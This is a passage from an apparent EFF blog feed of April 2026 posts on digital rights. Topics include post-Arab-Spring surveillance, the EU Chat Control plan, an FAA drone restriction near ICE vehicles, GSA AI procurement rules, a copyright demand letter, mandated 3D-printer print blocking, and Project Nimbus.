security becomes a second job. 
People describe carrying multiple phones, keeping one for relatively “clean” uses and others for riskier conversations, splitting identities across platforms, using coded language, and moving their organizing off mainstream services when possible. Pushing this burden onto users is a political choice: states, platforms, and vendors could build systems that are safe by design; instead, they externalize risk to the people they watch and punish. Even against that backdrop, civil society organizations have refused to capitulate to security agencies and vendors. Regional coalitions have demanded strict export controls and outright bans on selling intrusive surveillance tech to autocratic governments. Advocates have also pushed companies to do more than box‑ticking “due diligence.” Work with surveillance‑tech firms in the context of migration and border control has repeatedly shown that most are still far from serious human‑rights assessments, let alone willing to turn down these lucrative contracts. Many of the same governments that have been critical of others on the issue of human rights have hosted or licensed companies that build these tools, in some cases buying similar capabilities for their own security agencies. European authorities, for instance, have investigated FinFisher’s export of spyware “made in Germany” to Turkey and other non‑EU governments. Meanwhile, the NSO Group has at least 22 Pegasus contracts with security and law‑enforcement agencies in 12 EU countries. This is a transnational industry, not a localized problem. Against near impossible odds, people continue finding pathways to freedom. The global surveillance sector reinforces the same hierarchies and violence that people have found ways to survive for generations. Queer activists and others at the sharpest edges of this system have had to develop their own forms of resistance, including against biometric and data‑driven targeting. 
Encryption, circumvention tools, and security training are not silver bullets, but they remain essential for anyone trying to organize, document abuses, or simply exist online with a bit less risk. Resources like EFF’s Surveillance Self‑Defense are one piece of that ecosystem, alongside trainers and groups who have been doing this work on the ground for years.​ Defending the Future of Digital Dissent The Arab Spring is often remembered through images of packed squares and hopeful tweets. But contending with its aftermath means confronting the surveillance architecture built in its shadow: laws that turn online speech into a crime, spyware and biometric systems that turn phones and faces into tracking beacons, and platform practices that routinely sacrifice the people most at risk. None of that is inevitable, and none of it is confined to one part of the world. Accountability has to reach both governments and the companies that profit from arming them with these tools. That means pushing for far stronger limits on how surveillance tech is built, sold, and deployed; demanding meaningful transparency when these systems are used; and defending the tools people rely on to communicate and organize safely, including robust encryption and secure channels. It also means taking direction from the people and communities who have been navigating and resisting this landscape for years. Surveillance itself is transnational: tools, playbooks, and data move across borders as easily as money. And so we, too, continue our work, documenting abuses, sharing security knowledge, and collectively organizing against these violent systems. ​This is the third installment of a blog series reflecting on the global digital legacy of the 2011 Arab uprisings. Read the rest of the series here.

  • EU Parliament Blocks Mass-Scanning of Our Chats—What's Next?
    by Christoph Schmon on April 7, 2026 at 7:24 pm

    The EU’s so-called Chat Control plan, which would mandate mass scanning and other encryption breaking measures, has had some good news lately. The most controversial idea, the forced requirement to scan encrypted messages, was given up by EU member states. And now, another win for privacy: the EU Parliament has dealt a real blow to voluntary mass-scanning of chats by voting to not prolong an interim derogation from e-Privacy rules in the EU. These rules allowed service providers, temporarily, to scan private communication.   But no one should celebrate just yet. We said there is more to it, and voluntary scanning is a key part. Unlike in the U.S., where there is no comprehensive federal privacy law, the general and indiscriminate scanning of people’s messages is not legal in the EU without a specific legal basis. The e-Privacy derogation law, which gave (limited) cover for such activities, has now expired. Does that mean mass scanning will stop overnight?   Not really.  Companies have continued similar scanning practices during past gaps. Google, Meta, Microsoft, and Snap have already signaled in a joint statement to “continue to take voluntary action on our relevant Interpersonal Communication Services.” Whether this indicates continued scanning of our private communication is not entirely clear, but what is clear is that such activity would now risk breaching EU law. Then again, lack of compliance with EU data protection and privacy rules is nothing new for big tech in Europe.  Most importantly, the “Chat Control” proposal for mandatory detection of child abuse material (CSAM) is still alive and being negotiated. It has shifted the focus toward so-called risk mitigation measures, such as problematic age verification and voluntary activities. If platforms are expected to adopt these as part of their compliance, they risk no longer being truly voluntary. While mass scanning may be gone on paper, some broader concerns remain.   So, where does this leave us? 
The immediate priority is to make sure the expired exception for mass scanning is not revived. At the same time, lawmakers need to pull the teeth from the currently negotiated Chat Control proposal by narrowing risk mitigation measures. This means ensuring that age verification does not become a default requirement and “voluntary activities” are not turned into an expectation to scan our communications.    As we said before, this is a zombie proposal. It keeps coming back and must not be allowed to return through the back door. 

  • Triple Header for Privacy’s Defender in New York
    by Aaron Jue on April 3, 2026 at 11:15 pm

    You’re invited on a journey inside the privacy battles that shaped the internet. EFF’s Executive Director Cindy Cohn has tangled with the feds, fought for your data security, and argued before judges to protect our access to science and knowledge on the internet. Join Cindy at three events in New York discussing her bestselling new book: Privacy's Defender: My Thirty-Year Fight Against Digital Surveillance, on sale now. All proceeds from the book benefit EFF. Find the full event details below, and RSVP to let us know if you can make it. April 20 - With Women in Security and Privacy (WISP) Join Women in Security and Privacy (WISP) and EFF for a conversation featuring American University Senior Professorial Lecturer Chelsea Horne and EFF Executive Director Cindy Cohn as they dive into data security, Federal access to data, and your digital rights. Privacy's Defender with WISPKennedys22 Vanderbilt Avenue, Suite 2400, New York, NY 10017Monday, April 20, 20266:00 pm to 8:00 pmREGISTER NOW April 21 - With Julie Samuels at Civic Hall Join Tech:NYC President and CEO Julie Samuels, in conversation with EFF Executive Director Cindy Cohn for a discussion about Cindy's work, her new book, and what we're all wondering: Can we have private conversations if we live our lives online? Privacy's Defender at Civic HallCivic Hall124 E 14th St, New York, NY 10003Tuesday, April 21, 20266:00 pm to 9:00 pmREGISTER NOW April 23 - With Anil Dash at Brooklyn Public Library Join antitech Principal & Cofounder Anil Dash, in conversation with EFF Executive Director Cindy Cohn to discuss Cindy's new book: Privacy's Defender: My Thirty-Year Fight Against Digital Surveillance. 
Privacy's Defender at Brooklyn Public LibraryBrooklyn Public Library - Central Library, Info Commons Lab10 Grand Army Plz 1st floor, Brooklyn, NY 11238Thursday, April 23, 20266:00 pm to 7:30 pmREGISTER NOW "Privacy’s Defender is a compelling account of a life well lived and an inspiring call to action for the next generation of civil liberties champions."~Edward Snowden, whistleblower; author of Permanent Record Can't make it? Look for Cindy at a city (or web connection) near you! Find the latest tour dates on the Privacy’s Defender hub or follow EFF for more. Part memoir and part legal history for the general reader, Privacy’s Defender is a compelling testament to just how much privacy and free expression matter in our efforts to combat authoritarianism, grow democracy, and strengthen human rights. Thank you for being a part of that fight.Want to support the cause and get a copy of the new book? New or renewing EFF members can preorder one as their annual gift!

  • The FAA’s “Temporary” Flight Restriction for Drones is a Blatant Attempt to Criminalize Filming ICE
    by Sophia Cope on April 3, 2026 at 10:25 pm

    Legal intern Raj Gambhir was the principal author of this post. Update: On April 15, 2026 the FAA rescinded the TFR (FDC 6/4375) and instead issued an advisory (FDC 6/2824), which states:  [Drone] operators are advised to avoid flying in proximity to: Department of War (DOW), Department of Energy (DOE), Department of Justice (DOJ), and Department of Homeland Security (DHS) covered mobile assets as defined in 10 U.S.C. 130i [DOW/DOD], 10 U.S.C. 6227 [DOE], and 6 U.S.C. 124n [DHS], including ground vehicle convoys and their associated escorts. [Drone] operators who fly within this airspace are warned that [the agencies] may take action that results in the interference, disruption, seizure, damaging, or destruction of unmanned [aircraft] deemed to pose a credible safety or security threat to covered mobile assets. [Drone] operators should therefore exercise caution when flying in proximity of all DOW, DOE, DOJ and DHS mobile assets." The Reporters Committee for Freedom of the Press (RCFP) plans to continue with its lawsuit (Levine v. FAA). Original post: The Trump administration has restricted the First Amendment right to record law enforcement by issuing an unprecedented nationwide flight restriction preventing private drone operators, including professional and citizen journalists, from flying drones within half a mile of any ICE or CBP vehicle. In January, EFF and media organizations including The New York Times and The Washington Post responded to this blatant infringement of the First Amendment by demanding that the FAA lift this flight restriction. Over two months later, we’re still waiting for the FAA to respond to our letter. The First Amendment guarantees the right to record law enforcement. As we have seen with the extrajudicial killings of George Floyd, Renée Good, and Alex Pretti, capturing law enforcement on camera can drive accountability and raise awareness of police misconduct. A 21-Month Long “Temporary” Flight Restriction? 
The FAA regularly issues temporary flight restrictions (TFRs) to prevent people from flying into designated airspace. TFRs are usually issued during natural disasters, or to protect major sporting events and government officials like the president, and in most cases last mere hours. Not so with the restriction numbered FDC 6/4375, which started on January 16, 2026. This TFR lasts for 21 months—until October 29, 2027—and covers the entire nation. It prevents any person from flying any unmanned aircraft (i.e., a drone) within 3000 feet, measured horizontally, of any of the “facilities and mobile assets,” including “ground vehicle convoys and their associated escorts,” of the Departments of Defense, Energy, Justice, and Homeland Security. Violators can be subject to criminal and civil penalties, and risk having their drones seized or destroyed. In practical terms, this TFR means that anyone flying their drone within a half mile of an ICE or CBP agent’s car (a DHS “mobile asset”) is liable to face criminal charges and have their drone shot down. The practical unfairness of this TFR is underscored by the fact that immigration agents often use unmarked rental cars, use cars without license plates, or switch the license plates of their cars to carry out their operations. Nor do they provide prior warning of those operations. The TFR is an Unconstitutional Infringement of Free Speech While the FAA asserts that the TFR is grounded in its lawful authority, the flight restriction not only violates multiple constitutional rights, but also the agency’s own regulations. First Amendment violation. As we highlighted in the letter, nearly every federal appeals court has recognized the First Amendment right of Americans to record law enforcement officers performing their official duties. 
By subjecting drone operators to criminal and civil penalties, along with the potential destruction or seizure of their drone, the TFR punishes—without the required justifications—lawful recording of law enforcement officers, including immigration agents.   Fifth Amendment violation. The Fifth Amendment guarantees the right to due process, which includes being given fair notice before being deprived of liberty or property by the government. Under the flight restriction, advanced notice isn’t even possible. As discussed above, drone operators can’t know whether they are within 3000 horizontal feet of unmarked DHS vehicles. Yet the TFR allows the government to capture or even shoot down a drone if it flies within the TFR radius, and to impose criminal and civil penalties on the operator. Violations of FAA regulations. In issuing a TFR, the FAA’s own regulations require the agency to “specify[] the hazard or condition requiring” the restriction. Furthermore, the FAA must provide accredited news representatives with a point of contact to obtain permission to fly drones within the restricted area. The FAA has satisfied neither of these requirements in issuing its nationwide ban on drones getting near government vehicles. EFF Demands Rescission of the TFR We don’t believe it’s a coincidence that the TFR was put in place in January 2026, at the height of the Minneapolis anti-ICE protests, shortly after the killing of Renée Good and shortly before the shooting of Alex Pretti. After both of those tragedies, civilian recordings played a vital role in contradicting the government’s false account of the events. By punishing civilians for recording federal law enforcement officers, the TFR helps to shield ICE and other immigration agents from scrutiny and accountability. It also discourages the exercise of a key First Amendment right. EFF has long advocated for the right to record the police, and exercising that right today is more important than ever. 
Finally, while recording law enforcement is protected by the First Amendment, be aware that officers may retaliate against you for exercising this right. Please refer to our guidance on safely recording law enforcement activities.

  • Tech Nonprofits to Feds: Don’t Weaponize Procurement to Undermine AI Trust and Safety
    by Corynne McSherry on April 3, 2026 at 5:37 pm

    While the very public fight continues between the Department of Defense and Anthropic over whether the government can punish a company for refusing to allow its technology to be used for mass surveillance, another agency of the U.S. government is quietly working to ensure that this dispute will never happen again. How? By rewriting government procurement rules. Using procurement — meaning, the processes by which governments acquire goods and services — to accomplish policy goals is a time-honored and often appropriate strategy. The government literally expresses its politics and priorities by deciding where and how it spends its money. To that end, governments can and should give our tax dollars to companies and projects that serve the public interest, such as open-source software development, interoperability, or right to repair. And they should withhold those dollars from those that don’t, like shady contractors with inadequate security systems. New proposed rules for the principal agency in charge of acquiring goods, property, and services for the federal government, the General Services Administration (GSA), are supposed to be primarily an effort to implement one policy priority: promoting “ideologically neutral” American AI innovation. But the new guidelines do far more than that. As explained in comments filed today with our partners at the Center for Democracy and Technology, the Protect Democracy Project, and the Electronic Privacy Information Center, the GSA’s guidelines include broad provisions that would make AI tools less safe and less useful. If finally adopted, these provisions would become standard components of every federal contract. You can read the full comments here. 
The most egregious example is a requirement that contractors and government service providers must license their AI systems to the government for “all lawful purposes.” Given the government’s loose interpretations of the law, ability to find loopholes to surveil you, and willingness to do illegal spying, we need serious and proactive legal restrictions to prevent it from gobbling up all the personal data it can acquire and using even routine bureaucratic data for punitive ends. Relatedly, the draft rules require that “AI System(s) must not refuse to produce data outputs or conduct analyses based on the Contractor’s or Service Provider’s discretionary policies.” In other words, if a company’s safety guardrails might prevent responding to a government request, the company must disable those guardrails. Given widespread public concerns about AI safety, it seems misguided, at best, to limit the safeguards a company deems necessary. There are myriad other problems with the draft rules, such as technologically incoherent “anti-Woke” requirements. But, the overarching problem is clear: much of this proposal would not serve the overall public interest in using American tax dollars to promote privacy, safety, and responsible technological innovation. The GSA should start over.

  • Double Shot of Privacy's Defender in D.C.
    by Aaron Jue on April 3, 2026 at 3:58 pm

    You’re invited on a journey inside the privacy battles that shaped the internet. EFF’s Executive Director Cindy Cohn has tangled with the feds, fought for your data security, and argued before judges to protect our access to science and knowledge on the internet. Join Cindy at two events in Washington, D.C. on April 13 and 14 discussing her new book: Privacy's Defender: My Thirty-Year Fight Against Digital Surveillance, on sale now. All proceeds from the book benefit EFF. Find the full event details below, and RSVP to let us know if you can make it. April 13 - With Gigi Sohn at Busboys & Poets Join longtime public advocate for universal, open and affordable networks Gigi Sohn, in conversation with EFF Executive Director Cindy Cohn for a discussion about Cindy's work, her new book, and what we're all wondering: Can we have private conversations if we live our lives online? Privacy's Defender at Busboys & PoetsBusboys & Poets - 14th & V2021 14th St NW, Washington, DC 20009Monday, April 13, 20266:30 pm to 8:30 pm Register Now April 14 - With Women in Security and Privacy (WISP) Join Women in Security and Privacy (WISP) and EFF for a conversation featuring American University Senior Professorial Lecturer Chelsea Horne and EFF Executive Director Cindy Cohn as they dive into data security, Federal access to data, and your digital rights.  Privacy's Defender with WISPTrue Reformer Building - Lankford Auditorium1200 U St NW, Washington, DC 20009Tuesday, April 14, 20266:00 pm to 8:30 pm REGISTER NOW "Privacy’s Defender is a compelling account of a life well lived and an inspiring call to action for the next generation of civil liberties champions." ~Edward Snowden, whistleblower; author of Permanent Record Can't make it? Look for Cindy at a city (or web connection) near you! Find the latest tour dates on the Privacy’s Defender hub or follow EFF for more. 
Part memoir and part legal history for the general reader, Privacy’s Defender is a compelling testament to just how much privacy and free expression matter in our efforts to combat authoritarianism, grow democracy, and strengthen human rights. Thank you for being a part of that fight.Want to support the cause and get a copy of the new book? New or renewing EFF members can preorder one as their annual gift!

  • Weakening Speech Protections Will Punish All of Us—Not Just Meta
    by David Greene on April 2, 2026 at 10:43 pm

    Recently, a California Superior Court jury found that Meta and YouTube harmed a user through some of the features they offered. And a New Mexico jury concluded that Meta deceived young users into thinking its platforms were safe from predation.  It’s clear that many people are frustrated by big tech companies and perhaps Meta in particular. We, too, have been highly critical of them and have pushed for years to end their harmful corporate surveillance. So it’s not surprising that a jury felt like Mark Zuckerberg and his company, along with YouTube, needed to be held accountable.  While it would be easy to claim that these cases set a legal precedent that should make social media companies fearful, that’s not exactly true. And that’s actually a good thing for the internet and its users.  These jury trials were just an early step in a long road through the court system. These cases will now go up on appeal, where the courts’ rulings about the First Amendment and immunity under Section 230 will likely get reconsidered.  As we have argued many times before, the First Amendment protects both user speech and the choices platforms make on how to deliver that speech (in the same way it protects newspapers' right to curate their editorial pages as they see fit). Features on social media sites that are designed to connect users cannot be separated from the users’ speech, which is why courts have repeatedly held that these features are indeed protected.  So while it may be tempting to celebrate these juries’ decisions as a "win" against big tech, in fact the ramifications of lowering First Amendment and immunity standards on other speakers—ones that members of the public actually like, and do not want to punish—are bad. We can’t create less protective speech rules for Meta and Google alone just because we want them held accountable for something else. 
As we have often said, much of the anger against these companies arises from people rightfully feeling that these companies harvest and exploit their data, and monetize their lives for crass economic reasons. We therefore continue to urge Congress to pass a comprehensive national privacy law with a private right of action to address these core concerns.

  • A Baseless Copyright Claim Against a Web Host—and Why It Failed
    by Betty Gedlu on April 2, 2026 at 9:34 pm

    Copyright law is supposed to encourage creativity. Too often, it’s used to extract payouts from others. Higbee & Associates, a law firm known for sending copyright demand letters to website owners, targeted May First Movement Technology, accusing it of infringing a photograph owned by Agence France-Presse (AFP). The claim was baseless. May First didn’t post the photo. It didn’t even own the website where the photo appeared. May First is a nonprofit membership organization that provides web hosting and technical infrastructure to social justice groups around the world. The allegedly infringing image was posted years ago by one of May First’s members, a human rights group based in Mexico. When May First learned about the copyright complaint, it ensured that the group removed the image. That should have been the end of it. Instead, the firm demanded payment. So EFF stepped in as May First’s counsel and explained why AFP and Higbee had no valid claim. After receiving our response, Higbee backed down. This outcome is a reminder that targets of copyright demands often have strong defenses—especially when someone else posted the material. Hosting Content Isn’t the Same as Publishing It Copyright law treats those who create or control content differently from those who simply provide the tools or infrastructure for others to communicate. In this case, May First provided hosting services but didn’t post the photo. Courts have long recognized that service providers aren’t direct infringers when they merely store material at the direction of users. In those cases, service providers lack “volitional conduct”—the intentional act of copying or distributing the work. Copyright law also recognizes that intermediaries can’t realistically police everything users upload. That’s why legal protections like the Digital Millennium Copyright Act safe harbors exist. 
Even outside those safe harbors, courts still shield service providers from liability when they promptly respond to notices. May First did exactly what the law expects: it notified its member, and the image came down. A Claim That Should Have Been Withdrawn Much Sooner The troubling part of this story isn’t just that a demand was sent. It’s that Higbee and AFP continued to demand money and threaten litigation after May First explained that it was merely a hosting provider and had the image removed. In other words, the claim was built on shaky legal ground from the start. Once May First explained its role, Higbee should have withdrawn its demand. Individuals and small nonprofits shouldn’t need lawyers just to stop aggressive copyright shakedowns. Statutory Damages Fuel Copyright Abuse This isn’t an isolated case—it’s a predictable result of copyright law’s statutory damages regime. Statutory damages can reach $150,000 per work, regardless of actual harm. That enormous leverage incentivizes firms like Higbee to send mass demand letters seeking quick settlements. Even meritless claims can generate revenue when recipients are too afraid, confused, or resource-constrained to fight back. This hits community organizations, independent publishers, and small service providers that don’t have in-house legal teams especially hard. Faced with the threat of ruinous statutory damages, many just pay what is demanded. That’s not how copyright law should work. Know Your Rights If you receive a copyright demand based on material someone else posted, don’t assume you’re liable. You may have defenses based on: Your role as a hosting or service provider Lack of volitional conduct Prompt removal of the material after notice The statute of limitations The copyright owner’s failure to timely register the work The absence of actual damages Every situation is different, but the key point is this: a demand letter is not the same as a valid legal claim. 
    Standing Up to Copyright Trolls May First stood its ground, and Higbee abandoned its demand after we explained the law. But the bigger problem remains. Copyright’s statutory damages framework enables aggressive enforcement tactics that target the wrong parties and chill lawful online activity. Until lawmakers fix these structural incentives, organizations and individuals will keep facing pressure to pay up—even when they’ve done nothing wrong. If you get one of these demand letters, remember: you may have more rights than it suggests. EFF Letter to Higbee and Associates, March 4, 2026

  • Print Blocking Won't Work - Permission to Print Part 2
    by Cliff Braun on April 2, 2026 at 5:57 pm

    This is the second post in a series on 3D print blocking, for the first entry check out: Print Blocking is Anti-Consumer - Permission to Print Part 1 Legislators across the U.S. are proposing laws to force “print blockers” on 3D printers sold in their states. This mandated censorware is doomed to fail for its intended purpose, but will still manage to hurt the professional and hobbyist communities relying on these tools. 3D printers are commonly used to repair belongings, decorate homes, print figurines, and so much more. It’s not just hobbyists; 3D printers are also used professionally for parts prototyping and fixturing, small-batch manufacturing, and workspace organization. In rare cases, they’ve also been used to print parts needed for firearm assembly. Many states have already banned manufacturing firearms using computer controlled machine tools, which are called “Computer Numerical Control or CNC machines,” and 3D printers without a license. Recently proposed laws seek to impose technical limitations onto 3D printers (and in some cases, CNC machines) in the hope of enforcing this prohibition. This is a terrible idea; these mandates will be onerous to implement and will lock printer users into vendor software, impose one-time and ongoing costs on both printer vendors and users, and lay the foundation for a 3D-print censorship platform to be used in other jurisdictions. We dive more into these issues in the first part of this series. On a pragmatic level, however, these state mandates are just wishful thinking. Below, we dive into how 3D printing works, why these laws won’t deter the printing of firearms, and how regular lawful use will be caught in the proposed dragnet. How 3D Printers Work To understand the impact of this proposed legislation, we need to know a bit about how 3D printers work. 
The most common printers work similarly to a computer-controlled hot glue gun on a motion platform; they follow basic commands to maintain temperature, extrude (push) plastic through a nozzle, and move a platform. These motions together build up layers to make a final “print.” Modern 3D printers often offer more features like Wi-Fi connectivity or camera monitoring, but fundamentally they are very simple machines. The basic instructions used by most 3D printers are called Geometric Code, or G-Code, which specify very basic motions such as “move from position A to position B while extruding plastic.” The list of commands that will eventually print up a part are transferred to the printer in a text file thousands-to-millions of lines long. The printer dutifully follows these instructions with no overall idea of what it is printing. While it is possible to write G-Code by hand for either a CNC machine or a 3D printer, the vast majority is generated by computer aided manufacturing (CAM) software, often called a “slicer” in 3D printing since it divides a 3D model into many 2D slices then generates motion instructions.  This same general process applies to CNC machines which use G-Code instructions to guide a metal removal tool. CNC machines have been included in previous prohibitions on firearm manufacturing and file distribution and are also targeted in some of these bills. There are other types of 3D printers such as those that print concrete, resin, metal, chocolate and other materials using slightly different methods. All of these would be subject to the proposed requirements regardless of how unlikely doing harm with a gun made out of chocolate would be.  Simple rectangular 3D model for test fit Part of a 173490 line long G-Code file produced by slicer for simple rectangular model. Part of a 173,490 line long G-Code file for a simple rectangular part. How is Firearm Detection Supposed to Work? 
Under these proposed laws, manufacturers of consumer 3D printers must ensure their printers only work with their software, and implement firearm detection algorithms on either the printer itself or in a slicer software. These algorithms must detect firearm files using a maintained database of existing models. Vendors of printers must then verify that printers are on the allow-list maintained by the state before they can offer them for sale. Owners of printers will be guilty of a crime if they circumvent these intrusive scanning procedures or load alternative software, which they might do because their printer manufacturer ends support. Owners of existing noncompliant 3D printers in regulated states will be unable to resell their printers on the secondary market legally. What Will Actually Happen? While the proposed laws allow for scanning to happen on either the printer itself or in the slicer software, the reality is more complicated.  The computers inside many 3D printers have very limited computational and storage ability; it will be impossible for the printer’s computer to render the G-Code into a 3D model to compare with the database of prohibited files. Thus the only way to achieve this through the machine would be to upload all printer files to a cloud comparison tool, creating new delays, errors, and unacceptable invasions of privacy. Many vendors will instead choose to permanently link their printers to a specific slicer that implements firearm detection. This requires cryptographic signing of G-Code to ensure only authorized prints are completed, and will lock 3D printer owners into the slicer chosen by their printer vendor. Regardless of the specifics of their implementation, these algorithms will interfere with 3D printers' ability to print other parts without actually stopping manufacture of guns. It takes very little skill for a user to make slight design tweaks to either a model or G-Code to evade detection. 
    One can also design incomplete or heavily adorned models which can be made functional with some post-print alterations. While this would be pioneered by skilled users—like the ones who designed today’s 3D printed guns—once the design and instructions are out there anyone able to print a gun today will be able to follow suit.   Firearm part identification features also impose costs onto 3D printer manufacturers, and hence their end consumers. 3D printer manufacturers must develop or license these costly algorithms and continuously maintain and update both the algorithm and the database of firearm models. Older printers that cannot comply will not be able to be resold in states where they are banned, creating additional E-waste. While those wishing to create guns will still be able to do so, people printing other functional parts will likely be caught up in these algorithms, particularly for things like film props, kids’ toys, or decorative models, which often closely resemble real firearms or firearm components. What Are The Impacts of These Changes? Technological restrictions on manufacturing tools’ abilities are harmful for many reasons. EFF is particularly concerned with this regulation locking a 3D printer to proprietary vendor software. Vendors will be able to use this mandate to support only in-house materials, locking users into future purchases. Vendor slicer software is often based on out-of-date, open source software, and forcing users to use that software deprives them of new features or even use of their printer altogether if the vendor goes out of business. At worst, some of these bills will make it a misdemeanor to fix those problems and gain full control of your printer. File-scanning frameworks required by this regulation will lay the foundation for future privacy and freedom intrusions. 
This requirement could be co-opted to scan prints for copyright violations and be abused similar to DMCA takedowns, or to suppress models considered obscene by a patchwork of definitions. What if you were unable to print a repair part because the vendor asserted the model was in violation of their trademark? What if your print was considered obscene? Regardless of your position on current prohibitions on firearms, we should all fight back against this effort to force technological restrictions on 3D printers, and legislators must similarly abandon the idea. These laws impose real costs and potential harms among lawful users, lay the groundwork for future censorship, and simply won’t deter firearm printing. 

  • Print Blocking is Anti-Consumer - Permission to Print Part 1
    by Rory Mir on April 2, 2026 at 5:56 pm

    This is the first post in a series on 3D print blocking, for the next entry check out Print Blocking Won't Work - Permission to Print Part 2 When legislators give companies an excuse to write untouchable code, it’s a disaster for everyone. This time, 3D printers are being targeted across a growing number of states. Even if you’ve never used one, you’ve benefited from the open commons these devices have created—which is now under threat. This isn’t the first time we’ve gone to bat for 3D printing. These devices come in many forms and can construct nearly any shape with a variety of materials. This has made them absolutely crucial for anything from life-saving medical equipment, to little Iron Man helmets for cats, to everyday repairs. For decades these devices have been a proven engine for innovation, while democratizing a sliver of manufacturing for hobbyists, artists, and researchers around the world. For us all to continue benefiting from this grassroots creativity, we need to guard against the type of corporate centralization that has undermined so much of the promise of the digital era.  Unfortunately some state legislators are looking to repeat old mistakes by demanding printer vendors install an enshittification switch. In the U.S., three states have recently proposed that commercial 3D-printer manufacturers must ensure their printers only work with their software, and are responsible for checking each print for forbidden shapes—for now, any shape vendors consider too gun-like. The 2D equivalent of these “print-blocking” algorithms would be demanding HP prevent you from printing any harmful messages or recipes. Worse still, some bills can introduce criminal penalties for anyone who bypasses this censorware, or for anyone simply reselling their old printer without these restrictions.  If this sounds like Digital Rights Management (DRM) to you, you’ve been paying attention. 
This is exactly the sort of regulation that creates a headache and privacy risk for law-abiding users, is a gift for would-be monopolists, and can be totally bypassed by the lawbreakers actually being targeted by the proposals. Ghosting Innovation “Print blocking” is currently coming for an unpopular target: ghost guns. These are privately made firearms (PMFs) that are typically harder to trace and can bypass other gun regulations. Contrary to what the proposed regulations suggest, these guns are often not printed at home, but purchased online as mass-produced build-it-yourself kits and accessories. Scaling production with consumer 3D printers  is expensive, error-prone, and relatively slow.  Successfully making a working firearm with just a printer still requires some technical know-how, even as 3D printers improve beyond some of these limitations. That said, many have concerns about unlicensed firearm production and sales. Which is exactly why these practices are already illegal in many states, including all of the states proposing print blocking.  Mandating algorithmic print-blocking software on 3D printers and CNC machines is just wishful thinking. People illegally printing ghost guns and accessories today will have no qualms with undetectably breaking another law to bypass censoring algorithms. That’s if they even need to—the cat and mouse game of detecting gun-like prints might be doomed from the start, as we dive into in this companion post. Meanwhile, the overwhelming majority of 3D-printer users do not print guns. Punishing innovators, researchers, and hobbyists because of a handful of outlaws is bad enough, but this proposal does it by also subjecting everyone to the anticompetitive and anticonsumer whims of device manufacturers. Can’t make the DRM thing work We’ve been railing against Digital Rights Management (DRM) since the DMCA made it a federal crime to bypass code restricting your use of copyrighted content. 
The DRM distinction has since been weaponized by manufacturers to gain greater leverage over their customers and enforce anti-competitive practices.  The same enshittification playbook applies to algorithmic print blockers.  Restricting devices to manufacturer-provided software is an old tactic from the DRM playbook, and is one that puts you in a precarious spot where you need to bend to the whims of the manufacturer.  Only Windows 11 supported? You need a new PC. Tools are cloud-based? You need a solid connection. The company shutters? You now own an expensive paperweight—which used to make paperweights. It also means useful open source alternatives which fit your needs better than the main vendor’s tools are off the table. The 3D-printer community got a taste of this recently, as manufacturer Bambu Labs pushed out restrictive firmware updates complicating the use of open source software like OrcaSlicer. The community blowback forced some accommodations for these alternatives to remain viable. Under the worst of these laws, such accommodations, and other workarounds, would be outlawed with criminal penalties. People are right to be worried about vendor lock-in, beyond needing the right tool for the job. Making you reliant on their service allows companies to gradually sour the deal. Sometimes this happens visibly, with rising subscription fees, new paywalls, or planned obsolescence. It can also be more covert, like collecting and selling more of your data, or cutting costs by neglecting security and bug fixes. With expensive hardware on the line, they can get away with anything that won’t make you pay through the nose to switch brands. Indirectly, this sort of print-blocking mandate is a gift to incumbent businesses making these printers. It raises the upfront and ongoing costs associated with smaller companies selling a 3D printer, including those producing new or specialized machines. 
The result is fewer and more generic options from a shrinking number of major incumbents for any customer not interested in building their own 3D printer. Reaching the Melting Point It’s already clear these bills will be bad for anyone who currently uses a 3D printer, and having alternative software criminalized is particularly devastating for open source contributors. These impacts to manufacturers and consumers culminate into a major blow to the entire ecosystem of innovation we have benefited from for decades.  But this is just the beginning.  Once the infrastructure for print blocking is in place, it can be broadened. This isn’t a block of a very specific and static design, like how some copiers block reproductions of currency. Banning a category of design based on its function is a moving target, requiring a constantly expanding blacklist. Nothing in this legislation restricts those updates to firearm-related designs. Rather, if we let proposals like this pass, we open the door to the database of forbidden shapes for other powerful interests. Intellectual property is a clear expansion risk. This could look like Nintendo blocking a Pikachu toy, John Deere blocking a replacement part, or even patent trolls forcing the hand of hardware companies. Repressive regimes, here or abroad, could likewise block the printing of "extreme" and “obscene” symbols, or tools of resistance like popular anti-ICE community whistles.  Finally, even the most sympathetic targets of algorithmic censorship will result in false positives—blocking 3D-printer users’ lawful expression. This is something proven again and again in online moderation. Whether by mistake or by design, a platform that has you locked in has little incentive to offer remedies to this censorship. And these new incentives for companies to surveil each print can also impose a substantial chilling effect on what the user chooses to create. 
While 3D printers aren’t in most households, this form of regulation would set a dangerous precedent. Government mandating on-device censors which are maintained by corporate algorithms is bad. It won’t work. It consolidates corporate power. It criminalizes and blocks the grassroots innovation and empowerment which has defined the 3D-printer community. We need to roundly reject these onerous restraints on creation. 

  • Google and Amazon: Acknowledged Risks, and Ignored Responsibilities
    by Betty Gedlu on April 2, 2026 at 3:12 pm

    In late 2024, we urged Google and Amazon to honor their human rights commitments, to be more transparent with the public, and to take meaningful action to address the risks posed by Project Nimbus, their cloud computing contract that includes Israel’s Ministry of Defense and the Israeli Security Agency. Since then, a stream of additional reporting has reinforced that our concerns were well-founded. Yet despite mounting evidence of serious risk, both companies have refused to take action.  Amazon has completely ignored our original and follow-up letters. Google, meanwhile, has repeatedly promised to respond to our questions. Yet more than a year and a half later, we have seen no meaningful action by either company. Neither approach is acceptable given the human rights commitments these companies have made. Additionally, Microsoft required a public leak before it felt compelled enough to look into and find that its client, the Israeli government, was indeed misusing its services in ways that violated Microsoft’s public commitments to human rights. This should have given both Google and Amazon an additional reason to take a close look and let the public know what they find, but nothing of the sort materialized.  In such circumstances, waiting for definitive proof is not responsible risk management, it is willful blindness. Google: Known Risks, No Meaningful Action Google’s own internal assessments warned of the risks associated with Project Nimbus even before the contract was signed. Major news outlets have reported that Google provides the Israeli government with advanced cloud and AI services under Project Nimbus, including large-scale data storage, image and video analysis, and AI model development tools. These capabilities are exceptionally powerful, highly adaptable, and well suited for surveillance and military applications. 
